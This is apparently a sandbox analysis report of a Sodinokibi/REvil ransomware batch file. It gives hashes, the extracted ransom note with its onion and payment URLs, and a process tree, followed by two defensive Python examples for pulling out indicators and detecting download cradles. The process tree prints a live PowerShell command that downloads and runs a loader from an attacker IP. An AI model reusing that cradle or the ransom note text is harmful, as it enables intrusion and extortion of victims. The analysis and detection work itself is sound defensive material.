Analysis

  • max time kernel
    77s
  • max time network
    45s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    29-08-2020 19:10

General

  • Target

    9e35cd287a986dd3eab0fd5413dbbfb3.bat

  • Size

    215B

  • MD5

    d14242bd9a927a641dc49bf913b5b570

  • SHA1

    b031b26dd6d89c5672b9cb2f7fe66d650222a687

  • SHA256

    755c35484b2236919e799e05687ca2aff151593f39c9deee51c33f6f33c97c7a

  • SHA512

    ff13f23ffa4f9e0e568b9eb7aacfe9340d72e46dac773d51356b26b5323102c8d016f4c87ff6cb2d3d886961dd335382f37d88f27b6fac7264ae562079780ab0

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • ps1.dropper
    http://185.103.242.78/pastes/9e35cd287a986dd3eab0fd5413dbbfb3

Extracted

  • Path
    C:\5u9099-readme.txt
  • Family
    sodinokibi
  • Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 5u9099. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+]WE HAVE STEALED YOUR DATA FROM SERVERS AND ARE READY TO PUBLISH THEM IN PUBLIC ACCESS (USE TOR BROWSER TO VIEW)[+] http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/151?s=868059104c94b3003e6dc66f0ca2219d [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AF6D107408866E7D 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/AF6D107408866E7D Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: +2m6ax/BLMTVg9JsMDzGbKxLiU78wN9et9VGFCNiIYg+cPlZI/L9MmlOM4BPtg/g rZ7IpZ15AKV1O86CKPDY88duYwgmw8gvpsi9QRn5qBWtCWxwmVCQ+KYbLmH1m1Jq 28ozWvLM4Wlr659ywwHDZywKf0OFzkIT2FvOPGDd1HVHoYCTVQVtmKd2wroQ7bsS MaDB1Q9aRz3JIms25ZPnGVxZ+kAJDbb9pvgPhfCzsvNUpm6XbKtXDHzuZpFF9R5S MUaPNxmt6epLYTJi50VfVU98C9hQjk3FWsrOan8LDQc1VPyt2Uay7ruOF7v++8bD FPmlfazXA4TqxyWETpUojulkUwhMd0w2DdeBgMnfEjay/vT+U881QY95uOJRIRX+ xgGic9Aj3us6+8DHPuiP4fEwp5upg31/pNOjRKv3OGg+rAVJY8sofkA0baA04Nxc Vz9YSeyDhzqHIfiTjkYEQVBm9FJxV3takaFpJTjCbFZ9Rt+7+vIZihYq6DboLYOj HriGmbnmMXO55/ClUhqizJFNXIEg5dmAn+1fVPF04zC6kK/jRSTAfpycakqNM2cK meHaBto0bYTROhVUf1wlOLsrX99RLz4Qet1sOPUfsEfApJApg0uh8/xcCaJsWjDk Qybfr5Kx5WszgnKQBReH6TEblD+j7+GBcKmATOS6RwwJ1XUSbhxc348VKPfyn0mj iITYv6DnFqB1LPCcekDO++Y+30T1sA1WAXvZUMAeNg1BE2EWgWDCLC3nL1ZDohw4 nAAct4fK3/1lrQ+CNqPgm6hmxbJMPOCMPBBs5jPzR1e6pHUdSgpQN4j5sIwQYF1Y VySUMlsPanJGNgCA4rVbnHXtgZFmbZLs1Lgk3mXfoe87nT0dVio81Rv+i7gzwhfp Pw1DkWvQbMNHyVxgw6Haae8U656DuvpXXsNIb0EeoF3QluMHTKg1XHghn/nBiXr7 BJQ22NbwQ2OAk4rpntkCGzQBr0sLe8pft1tephVE2amZI6FUpE3s2dNg9z7cD09q aEITbcPVViXyDtSdVIPKp7+lcRNqqTXvI1uV6dB2kfjLYfyEy9GGfUH/Po3OxJV2 FYpKIVAKECuEvEmEdQdqaWK4JCxhMF7Zs8E726duvaJl0D2UHeGm/xCmq3d1j9hG lBOtTa1CtBvKZ7vmgJYuHUaoj+yznWVqkunAd0v7/DUeuymhGwYZz4rnXAlMuJyJ kVgOlHr9aKOGIHShfJ1a24cEsQsXsZ/gzy5/jzSymCgEPrLHaGQqy3GqxmbGHc0+ dnnweP+VV8RxImK6oy7frw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
  • URLs
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AF6D107408866E7D
    http://decryptor.cc/AF6D107408866E7D
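The extracted note carries everything a responder needs to scope an incident: the appended extension (5u9099), the note filename derived from it (the report's C:\5u9099-readme.txt), the 16-hex-character victim ID that both portal URLs end in, and the leak-site post. The following Python is an added example, not part of the sandbox report or the extractor that produced it; it runs on a trimmed excerpt of the note above (the key blob and boilerplate are cut) and on a constructed file listing, and the victim-ID format check is an assumption based on the two portal URLs shown.

```python
import re
from urllib.parse import urlparse

# Trimmed excerpt of the ransom note extracted in this report, constructed for the
# example: the key blob and most of the boilerplate are omitted, the lines that
# carry indicators are kept verbatim.
NOTE_EXCERPT = """---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 5u9099.
[+]WE HAVE STEALED YOUR DATA FROM SERVERS AND ARE READY TO PUBLISH THEM IN PUBLIC ACCESS (USE TOR BROWSER TO VIEW)[+]
http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/151?s=868059104c94b3003e6dc66f0ca2219d
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AF6D107408866E7D
b) Open our secondary website: http://decryptor.cc/AF6D107408866E7D
"""

EXT_RE = re.compile(r"has extension ([A-Za-z0-9]+)")
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")
# Assumption: the per-victim portal path is 16 upper-case hex characters, as in
# the two portal URLs of this note.
VICTIM_ID_RE = re.compile(r"^[0-9A-F]{16}$")


def extract_iocs(note: str) -> dict:
    """Pull the per-victim indicators out of a Sodinokibi/REvil note."""
    ext_match = EXT_RE.search(note)
    extension = ext_match.group(1) if ext_match else None

    urls = URL_RE.findall(note)
    portal_urls, other_urls, victim_ids = [], [], set()
    for url in urls:
        last = urlparse(url).path.rstrip("/").rsplit("/", 1)[-1]
        if VICTIM_ID_RE.match(last):
            portal_urls.append(url)
            victim_ids.add(last)
        else:
            other_urls.append(url)  # e.g. the leak-site post, which has no victim ID

    return {
        "extension": extension,
        # REvil drops its note as <extension>-readme.txt, which is how the
        # C:\5u9099-readme.txt path in the report lines up with the extension.
        "readme_name": f"{extension}-readme.txt" if extension else None,
        "victim_id": victim_ids.pop() if len(victim_ids) == 1 else None,
        "portal_urls": portal_urls,
        "other_urls": other_urls,
        "onion_hosts": sorted(
            h for h in (urlparse(u).hostname for u in urls) if h and h.endswith(".onion")
        ),
    }


def find_encrypted(paths, extension):
    """Return the paths whose final extension is the one named in the note."""
    suffix = "." + extension.lower()
    return [p for p in paths if p.lower().endswith(suffix)]


if __name__ == "__main__":
    iocs = extract_iocs(NOTE_EXCERPT)
    for key, value in iocs.items():
        print(f"{key}: {value}")
    # Constructed listing: two encrypted files, one untouched file, and the note itself.
    sample_listing = [
        r"C:\Users\Admin\Documents\budget.xlsx.5u9099",
        r"C:\Users\Admin\Pictures\holiday.jpg.5u9099",
        r"C:\Users\Admin\Documents\notes.txt",
        r"C:\5u9099-readme.txt",
    ]
    print(find_encrypted(sample_listing, iocs["extension"]))
```

The note itself is excluded by `find_encrypted` because it ends in `-readme.txt`, not in the extension; the victim ID is only reported when every portal URL agrees on it, so a note with mismatched IDs is flagged by a `None` rather than a guess.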

Signatures

  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 1 IoCs
  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 37 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9e35cd287a986dd3eab0fd5413dbbfb3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3816
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9e35cd287a986dd3eab0fd5413dbbfb3');Invoke-GBFBFRLC;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:908
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    PID:2328
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:3068
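The process tree is the most actionable part of this report: cmd.exe runs the 215-byte .bat, the .bat explicitly launches the 32-bit (SysWOW64) PowerShell host with a DownloadString/IEX cradle that pulls the loader from 185.103.242.78 and calls Invoke-GBFBFRLC, and every ransomware signature (extension changes, wallpaper, Program Files writes, privilege adjustment) is then attributed to that same PowerShell process, PID 908, which the trailing Start-Sleep keeps alive. The following Python is an added example and not part of the sandbox report: it runs a process-creation detection over constructed Sysmon-style records modelled on that tree. The record field names, the parent PIDs that are not shown in the report, the benign control event and the 600-second sleep threshold are all assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed Sysmon-style process-creation records modelled on the process tree
# in this report. They are sample input for the example, not sandbox output;
# ppid values not shown in the report (1200, 700) are made up.
SAMPLE_EVENTS = [
    {"pid": 3816, "ppid": 1200,
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9e35cd287a986dd3eab0fd5413dbbfb3.bat"'},
    {"pid": 908, "ppid": 3816,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "
                 r'"IEX (New-Object System.Net.WebClient).DownloadString('
                 r"'http://185.103.242.78/pastes/9e35cd287a986dd3eab0fd5413dbbfb3');"
                 r'Invoke-GBFBFRLC;Start-Sleep -s 10000"')},
    {"pid": 2328, "ppid": 700,
     "image": r"C:\Windows\system32\svchost.exe",
     "cmdline": r"C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc"},
    # Constructed benign control: a download to disk with no in-memory execution,
    # from the 64-bit host, launched by something other than a batch file. Must not fire.
    {"pid": 4444, "ppid": 1200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -Command (New-Object Net.WebClient).DownloadFile('https://example.test/tool.zip', 'tool.zip')"},
]

IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
DOWNLOAD_RE = re.compile(r"downloadstring|downloaddata|downloadfile|invoke-webrequest|\biwr\b|webclient", re.I)
URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.I)
SLEEP_RE = re.compile(r"start-sleep\s+-s(?:econds)?\s+(\d+)", re.I)
LONG_SLEEP_SECONDS = 600  # assumption: anything this long after a loader call is worth noting


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    pid: int
    indicators: list = field(default_factory=list)
    urls: list = field(default_factory=list)


def analyze(events):
    """Flag PowerShell launches that look like the cradle in this report."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        cmd = ev["cmdline"]
        f = Finding(pid=ev["pid"], urls=URL_RE.findall(cmd))
        if IEX_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
            f.indicators.append("download_cradle")   # fetched script is executed without touching disk
        if "\\syswow64\\" in ev["image"].lower():
            f.indicators.append("wow64_powershell")  # 32-bit host picked explicitly on an x64 machine
        parent = by_pid.get(ev["ppid"])
        if parent and basename(parent["image"]) == "cmd.exe" and ".bat" in parent["cmdline"].lower():
            f.indicators.append("parent_batch_script")
        m = SLEEP_RE.search(cmd)
        if m and int(m.group(1)) >= LONG_SLEEP_SECONDS:
            f.indicators.append("long_sleep")        # keeps the host process alive after the loader returns
        if f.indicators:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"PID {finding.pid}: {', '.join(finding.indicators)} urls={finding.urls}")
```

Requiring both the fetch and IEX keeps the rule quiet on ordinary scripted downloads (the control event), while the parent-process and SysWOW64 checks add context that the command line alone does not give; the extracted URL is the blocking indicator to hand to the network team.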

Network

MITRE ATT&CK Enterprise v6


Downloads

  • memory/908-0-0x0000000000000000-mapping.dmp
  • memory/908-1-0x0000000073960000-0x000000007404E000-memory.dmp (6.9MB)
  • memory/908-2-0x0000000006F30000-0x0000000006F31000-memory.dmp (4KB)
  • memory/908-3-0x0000000007690000-0x0000000007691000-memory.dmp (4KB)
  • memory/908-4-0x0000000007580000-0x0000000007581000-memory.dmp (4KB)
  • memory/908-5-0x0000000007D30000-0x0000000007D31000-memory.dmp (4KB)
  • memory/908-6-0x0000000007E80000-0x0000000007E81000-memory.dmp (4KB)
  • memory/908-7-0x0000000007FF0000-0x0000000007FF1000-memory.dmp (4KB)
  • memory/908-8-0x0000000007E10000-0x0000000007E11000-memory.dmp (4KB)
  • memory/908-9-0x0000000008440000-0x0000000008441000-memory.dmp (4KB)
  • memory/908-10-0x00000000087A0000-0x00000000087A1000-memory.dmp (4KB)
  • memory/908-11-0x0000000009E70000-0x0000000009E71000-memory.dmp (4KB)
  • memory/908-12-0x00000000093F0000-0x00000000093F1000-memory.dmp (4KB)